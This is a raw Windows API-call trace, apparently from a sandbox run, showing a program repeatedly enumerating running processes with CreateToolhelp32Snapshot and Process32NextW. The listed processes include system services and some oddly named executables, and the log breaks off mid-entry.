CloseHandle (hObject=0xbc) returned 1 [0150.517] Sleep (dwMilliseconds=0x12c) [0150.889] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0150.895] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0150.896] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, 
szExeFile="System")) returned 1 [0150.897] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0150.898] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0150.899] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0150.900] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0150.900] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0150.901] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0150.902] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, 
szExeFile="lsass.exe")) returned 1 [0150.903] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0150.904] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0150.905] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0150.905] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0150.906] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0150.907] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x24, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0150.908] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, 
szExeFile="audiodg.exe")) returned 1 [0150.909] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0150.910] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0150.911] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0150.912] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0150.914] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0150.915] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0150.916] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, 
szExeFile="dwm.exe")) returned 1 [0150.918] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0150.919] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0150.921] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0150.923] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0150.992] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0150.994] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0150.995] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, 
th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0150.997] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0150.998] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0151.000] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0151.001] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0151.003] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0151.004] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0151.005] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, 
cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0151.007] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0151.008] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0151.010] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0151.011] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0151.013] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0151.014] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0151.016] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, 
th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0151.017] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0151.019] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0151.020] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0151.021] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0151.023] CloseHandle (hObject=0xc4) returned 1 [0151.023] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0151.029] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0151.030] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 
[0151.031] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0151.032] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0151.098] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0151.099] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0151.100] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0151.101] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0151.103] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0151.104] 
Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0151.105] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0151.106] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0151.106] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0151.107] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0151.108] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x24, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0151.109] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0151.110] 
Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0151.111] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0151.112] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0151.113] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0151.115] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0151.116] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0151.118] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0151.119] 
Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0151.121] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0151.122] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0151.124] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0151.125] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0151.127] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0151.128] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, 
szExeFile="xplivecam.exe")) returned 1 [0151.130] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0151.131] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0151.133] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0151.134] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, 